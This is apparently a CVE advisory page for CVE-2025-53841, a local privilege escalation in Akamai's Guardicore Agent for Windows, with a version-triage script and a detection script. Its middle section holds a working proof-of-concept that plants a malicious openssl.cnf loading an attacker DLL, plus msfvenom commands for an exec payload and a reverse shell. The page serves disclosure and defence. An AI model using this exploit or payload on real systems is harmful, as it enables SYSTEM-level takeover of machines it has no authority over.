Security Vulnerability Report
CVE-2025-53841 CVSS 7.8 HIGH

Published: 2025-12-03 15:15:52
Last Modified: 2026-04-15 00:35:42

Description

The GC-AGENTS-SERVICE running as part of Akamai's Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted "openssl.cnf" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record; the affected versions below are taken from the advisory description. The fix shipped separately on four release branches, so each line is a per-branch threshold rather than a single cut-off.

Akamai Guardicore Platform Agent for Windows < v49.20.1
Akamai Guardicore Platform Agent for Windows < v50.15.0
Akamai Guardicore Platform Agent for Windows < v51.12.0
Akamai Guardicore Platform Agent for Windows < v52.2.0
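The four thresholds above are per-branch, which is easy to get wrong with a plain numeric comparison (50.14.x is newer than 49.20.1 yet still vulnerable). The following is an added triage helper, not Akamai code; it takes the fixed versions from the advisory text and treats branches the advisory does not mention (for example 48.x or 53.x) as "unknown" rather than guessing. The hostnames and versions in the sample inventory are constructed.

```python
#!/usr/bin/env python3
"""Classify Guardicore Platform Agent for Windows versions against the
CVE-2025-53841 fixed releases.

Added example, not vendor code. A version is vulnerable only if it is older
than the fix on its own major branch, because the fix was released on four
branches independently.
"""
import re

# Fixed versions per major release branch, as stated in the advisory.
FIXED_BY_BRANCH = {
    49: (49, 20, 1),
    50: (50, 15, 0),
    51: (51, 12, 0),
    52: (52, 2, 0),
}

# Accepts "v50.14.3", "50.14.3" and an optional fourth build component.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:\.\d+)?$")


def parse_version(text):
    """Parse a version string into an (major, minor, patch) tuple.

    Raises ValueError for anything that is not a dotted version.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def assess(version_text):
    """Return 'vulnerable', 'fixed' or 'unknown' for one agent version."""
    version = parse_version(version_text)
    fixed = FIXED_BY_BRANCH.get(version[0])
    if fixed is None:
        return "unknown"  # branch not covered by the advisory
    return "vulnerable" if version < fixed else "fixed"


def triage(inventory):
    """Map hostname -> verdict for a {hostname: version} inventory."""
    return {host: assess(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and versions are illustrative.
    sample = {
        "win-srv-01": "v49.19.0",  # below the 49.x fix
        "win-srv-02": "v49.20.1",  # exactly the 49.x fix
        "win-srv-03": "50.14.9",   # numerically above 49.20.1, still below 50.15.0
        "win-srv-04": "v52.2.0",   # 52.x fix
        "win-srv-05": "v53.0.0",   # branch not in the advisory
    }
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```

Feed it the version column exported from the management console (or collected from the agent's file version on each host) and act on "unknown" as a prompt to check the vendor changelog, not as a clean bill of health.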

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-53841 PoC - Akamai Guardicore Local Privilege Escalation

This PoC creates a malicious OpenSSL configuration file that loads a custom
DLL to achieve privilege escalation from a low-privileged user to SYSTEM.

Author: Security Researcher
CVE: CVE-2025-53841
CVSS: 7.8 (High)

The advisory does not publish the path from which GC-AGENTS-SERVICE reads
openssl.cnf; it only states that the location does not exist by default and
is writable by standard users (so it is not under Program Files, which
standard users cannot write to by default). Find it on a vulnerable build,
e.g. with Process Monitor filtered on the agent service process, Path ends
with "openssl.cnf", Result is NAME NOT FOUND, and pass it as the first
argument.
"""
import os
import sys


def create_malicious_openssl_config(config_path, dll_path):
    """
    Create a malicious openssl.cnf that loads a custom DLL through OpenSSL's
    "dynamic" engine. OpenSSL issues the engine LOAD command as soon as it
    processes the dynamic_path key, so the DLL's DllMain runs inside the
    service process while the configuration is still being parsed.

    Args:
        config_path: Path where openssl.cnf will be created
        dll_path: Path to the malicious DLL to load
    """
    malicious_config = f"""# OpenSSL configuration file
# Malicious config for CVE-2025-53841
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
dynamic = dynamic_section

[dynamic_section]
dynamic_path = {dll_path}
default_algorithms = ALL
"""
    with open(config_path, "w") as f:
        f.write(malicious_config)
    print(f"[+] Created malicious openssl.cnf at: {config_path}")
    print(f"[+] DLL path configured: {dll_path}")


def create_payload_dll(dll_path):
    """
    Print the msfvenom commands that generate a payload DLL. The payload runs
    from DllMain with the privileges of the service that loads it.
    """
    print("[!] Generate payload DLL using msfvenom:")
    print(f"    msfvenom -p windows/x64/exec CMD='whoami > C:\\temp\\pwned.txt' -f dll -o {dll_path}")
    print("[!] Or for a reverse shell:")
    print(f"    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o {dll_path}")


def trigger_vulnerability():
    """
    The config is only read when the service initialises OpenSSL, so the DLL
    runs on the next service start. Standard users normally cannot restart a
    service, so wait for a reboot, an agent upgrade, or another legitimate
    restart.
    """
    print("[*] Waiting for service restart or configuration reload...")
    print("[*] GC-AGENTS-SERVICE will load the malicious openssl.cnf")
    print("[*] This will execute the DLL with SYSTEM privileges")


def main():
    print("=" * 60)
    print("CVE-2025-53841 - Akamai Guardicore Local Privilege Escalation")
    print("=" * 60)

    if len(sys.argv) < 2:
        print(f"usage: {sys.argv[0]} <openssl.cnf path read by the service> [dll path]")
        sys.exit(1)
    target_path = sys.argv[1]
    dll_path = sys.argv[2] if len(sys.argv) > 2 else r"C:\temp\evil.dll"

    # Step 1: Create the (by default non-existent) directory if needed
    target_dir = os.path.dirname(target_path)
    if target_dir and not os.path.isdir(target_dir):
        try:
            os.makedirs(target_dir)
            print(f"[+] Created directory: {target_dir}")
        except PermissionError:
            print(f"[-] Cannot create {target_dir}: not user-writable, so not the vulnerable location")
            sys.exit(1)

    # Step 2: Generate payload DLL
    create_payload_dll(dll_path)

    # Step 3: Create malicious openssl.cnf
    create_malicious_openssl_config(target_path, dll_path)

    # Step 4: Wait for service restart
    trigger_vulnerability()

    print("\n[*] PoC completed. In a real attack:")
    print("    1. Wait for GC-AGENTS-SERVICE restart")
    print("    2. Check for successful privilege escalation")
    print("    3. Verify SYSTEM-level code execution")


if __name__ == "__main__":
    main()
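The PoC above leaves two traces a defender can key on: a non-SYSTEM account writing an openssl.cnf, and a SYSTEM process mapping a DLL from a directory standard users can write to. The following is an added detection example, not Akamai code, run over constructed events in a simplified Sysmon-like shape (Event ID 11 FileCreate, Event ID 7 ImageLoaded). The service image path C:\Program Files\Akamai\gc-agents-service.exe is a placeholder, since the advisory does not name the binary, and the "C:\Temp\openssldir" location is likewise invented for the sample and is not the real vulnerable path.

```python
#!/usr/bin/env python3
"""Detection logic for the CVE-2025-53841 technique over Sysmon-style events.

Added example, not vendor code. Flags:
  * EventID 11: an openssl.cnf created by an account other than SYSTEM
    (the attacker's first step).
  * EventID 7: a SYSTEM process loading a DLL from a user-writable tree
    (the moment the planted engine DLL runs).
All sample events and paths below are constructed placeholders.
"""
import json
import ntpath

# Directories standard users can write to by default on Windows.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
    "c:\\temp\\",
)
SYSTEM_ACCOUNT = "nt authority\\system"


def _norm(path):
    """Lower-case a Windows path and unify slashes for prefix matching."""
    return path.replace("/", "\\").lower()


def is_user_writable(path):
    """Heuristic: is the path under a tree standard users can write to?"""
    return _norm(path).startswith(USER_WRITABLE_PREFIXES)


def check_event(ev):
    """Return an alert string for one event dict, or None if benign."""
    user = ev.get("User", "").lower()
    if ev.get("EventID") == 11:
        target = ev.get("TargetFilename", "")
        # A non-SYSTEM account writing an OpenSSL config anywhere is suspect.
        if ntpath.basename(target).lower() == "openssl.cnf" and user != SYSTEM_ACCOUNT:
            return f"openssl.cnf written by {ev.get('User')} via {ev.get('Image')}: {target}"
    elif ev.get("EventID") == 7:
        loaded = ev.get("ImageLoaded", "")
        # A SYSTEM process mapping a DLL from a user-writable directory.
        if user == SYSTEM_ACCOUNT and is_user_writable(loaded):
            return f"SYSTEM process {ev.get('Image')} loaded DLL from user-writable path: {loaded}"
    return None


def scan(jsonl_lines):
    """Run check_event over JSON-lines input; return the alerts in order."""
    alerts = []
    for line in jsonl_lines:
        if line.strip():
            alert = check_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events. _SERVICE is a placeholder binary name.
_SERVICE = "C:\\Program Files\\Akamai\\gc-agents-service.exe"
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    # Installer running as SYSTEM writes a config under Program Files: benign.
    {"EventID": 11, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "TargetFilename": "C:\\Program Files\\SomeApp\\ssl\\openssl.cnf"},
    # Low-privileged user plants the crafted config (placeholder path).
    {"EventID": 11, "Image": "C:\\Users\\alice\\poc.exe", "User": "LAB\\alice",
     "TargetFilename": "C:\\Temp\\openssldir\\openssl.cnf"},
    # Service loads a system DLL: benign.
    {"EventID": 7, "Image": _SERVICE, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": "C:\\Windows\\System32\\bcrypt.dll", "Signed": "true"},
    # Service loads the planted engine DLL from a user-writable directory.
    {"EventID": 7, "Image": _SERVICE, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": "C:\\Temp\\evil.dll", "Signed": "false"},
])

if __name__ == "__main__":
    for alert in scan(SAMPLE_JSONL.splitlines()):
        print("[ALERT]", alert)
```

The Event ID 7 rule is the higher-fidelity one: it fires on the actual DLL load regardless of where the config file lives, so it does not depend on knowing the unpublished path. Tune the prefix list to the host's real ACLs (Process Monitor or icacls will show any additional user-writable directories the agent touches).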

References

https://community.akamai.com/customers/s/article/Windows-Agent-Vulnerability-Summary-and-Resolution
https://techdocs.akamai.com/guardicore-platform-agent/changelog
https://www.akamai.com/blog/security/advisory-cve-2025-53841-guardicore-local-privilege-escalation
https://www.tuv.com/landingpage/en/vulnerability-disclosure/
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-53841",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T15:15:51.830",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The GC-AGENTS-SERVICE running as part of Akamai´s Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted \"openssl.cnf\" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-829"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.akamai.com/customers/s/article/Windows-Agent-Vulnerability-Summary-and-Resolution",
        "source": "[email protected]"
      },
      {
        "url": "https://techdocs.akamai.com/guardicore-platform-agent/changelog",
        "source": "[email protected]"
      },
      {
        "url": "https://www.akamai.com/blog/security/advisory-cve-2025-53841-guardicore-local-privilege-escalation",
        "source": "[email protected]"
      },
      {
        "url": "https://www.tuv.com/landingpage/en/vulnerability-disclosure/",
        "source": "[email protected]"
      }
    ]
  }
}